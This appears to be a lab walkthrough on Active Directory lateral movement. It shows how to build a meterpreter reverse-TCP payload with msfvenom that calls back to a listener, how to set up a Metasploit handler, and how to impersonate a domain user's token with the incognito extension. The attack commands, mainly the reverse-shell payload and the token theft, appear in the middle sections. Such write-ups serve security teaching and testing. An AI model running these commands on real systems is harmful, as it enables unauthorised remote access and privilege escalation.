The lab consists of an Active Directory environment configured with the following parameters.
The following user accounts have been added to the domain structure:
Since Pass-the-Hash is a lateral movement technique, we require an established shell with administrative/system privileges on one of the network endpoints.
I will establish an interactive meterpreter session. To achieve this, I generate a malicious executable using msfvenom which will subsequently be executed by the user manuel.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.25.100.35 LPORT=4444 -f exe -o virus.exe
We initialize the Metasploit multi-handler payload listener:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
set LHOST 172.25.100.35
run
NOTE
Since we already hold valid credentials, executing a binary payload is not strictly necessary. We could pivot laterally using RDP or tools within the Impacket suite. However, because meterpreter includes the Mimikatz suite via thekiwiextension natively, I opted for this approach for convenience.
Note that this terminal session runs with Windows SYSTEM privileges, accurately replicating a scenario where an initial endpoint has been completely compromised, and the threat actor aims to pivot across the infrastructure.
This is an administrative token impersonation attack where an operator steals a logged-in domain user’s access token from an initially compromised endpoint to scale access levels across resources.
We load the native incognito extension in Metasploit:
load incognito
We list available tokens cached on the system to find our target account profile:
We execute token impersonation to switch our execution identity context without providing passwords:
impersonate_token AROCHE\\manuel
We can now spawn a shell running directly under the security context of manuel.
